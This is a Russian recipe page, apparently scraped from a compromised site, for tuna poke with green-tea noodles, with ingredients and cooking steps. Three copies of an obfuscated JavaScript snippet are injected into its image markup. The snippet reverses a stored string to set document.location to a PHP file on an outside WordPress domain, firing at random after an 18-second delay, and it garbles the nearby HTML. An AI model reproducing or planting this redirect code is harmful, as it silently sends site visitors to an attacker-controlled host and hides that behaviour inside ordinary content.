Поке — традиционное гавайское блюдо с сырой маринованной рыбой (обычно тунцом), рисом или лапшой и самыми разными добавками. Одним из его вариантов с нами поделилась команда паназиатского ресторана «Недальний Восток».
700 calories
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tovit-poke-2-recepta-gavaiskogo-blyuda-im-2.jpg»>
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tovit-poke-2-recepta-gavaiskogo-blyuda-im-2.jpg»>
Поке с тунцом и лапшой «зелёный чай»
Слегка замаринованный тунец с необычной лапшой и свежими овощами.
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tovit-poke-2-recepta-gavaiskogo-blyuda-im-2.jpg» class=»c2″ alt=»Изображение рецепта Поке с тунцом и лапшой «зелёный чай»» title=»Изображение рецепта Поке с тунцом и лапшой «зелёный чай»»>
Поке с тунцом и лапшой «зелёный чай»
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
30 минут
КОЛИЧЕСТВО ПОРЦИЙ:
4 порции
КАЛОРИЙНОСТЬ:
700 ккал
Сложность
Время
30 минут
Кол-во порций
4 порции
Калорийность
700 ккал
Ингредиенты
Тунец (блю фин)
340 г
Соус (соевый)
140 мл
Соус (из листьев периллы)
140 мл
Лапша («зелёный чай»)
480 г
Огурец
240 г
Помидоры
240 г
Авокадо
220 г
Дайкон (свежий)
60 г
Дайкон (маринованный)
60 г
Сельдерей (стебель)
60 г
Лук (красный)
40 г
Салат (романо)
40 г
Кинза
по вкусу
Масло (оливковое)
по вкусу
Соль (морская)
по вкусу
Перец (чёрный молотый)
по вкусу
Процесс приготовления
- Нарежьте на крупные кубики тунца и замаринуйте его в соусах соевом и из листьев периллы минут на десять.
- Отварите лапшу в кипящей подсоленной воде в течение 5-6 минут.
- Крупно нарежьте авокадо, помидоры, огурцы и листья романо. Заправьте оливковым маслом, солью и перцем по вкусу. Перемешайте.
- Мелко нарежьте красный лук и стебель сельдерея. Заправьте маслом и перемешайте.
- Свежий и маринованный дайкон нарежьте тонкой соломкой. Тоже заправьте маслом и перемешайте.
- Выложите в глубокие тарелки лапшу и миксы из овощей, а сверху — кусочки маринованного тунца. Полейте оставшимся маринадом и украсьте кинзой.
Статьи по теме
Как приготовить стейк из тунца: 3 простых рецепта
Как приготовить ужин из банки консервированного тунца: 3 простых рецепта
3 оригинальных рыбных рецепта
Какая рыба самая полезная